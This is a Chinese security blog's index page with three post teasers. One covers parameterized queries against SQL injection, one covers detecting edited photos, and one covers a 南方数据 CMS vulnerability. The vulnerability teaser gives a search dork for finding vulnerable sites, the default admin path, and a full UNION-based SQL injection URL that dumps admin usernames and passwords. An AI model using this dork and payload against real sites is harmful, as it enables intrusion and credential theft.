实例演示参数化查询防止 SQL 注入写在前面SQL 注入的危害就不用我多说了,之前也有文章从攻的层面写过关于此的。今天主要是从防的层面来写这篇文章。本篇从两个角度来防止SQL注入,前端验证用户输入,后端做参数化查询。 more >> 2017-07-14
美眉别唬我,我很单纯今天看到小基友发了这张图,瞬间心情复杂。 恕我直言,心情犹如吃 si 一样。 我这么单纯为什么要这样对我?还我一个真实的世界吧。如何辨别网图或者被P过的图片呢? more >> 2017-07-14
南方数据企业0day漏洞00x0 漏洞简述 该漏洞其实早就爆出了。 漏洞影响版本 v10.0、v11.0。 关键字:“inurl:HomeMarket.asp” 默认后台:/admin 直接爆出用户密码,构造 URL 如下: 1http://www.xxx.com/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''=' 拿 shell 方法貌似有三种: more >> 2017-07-14
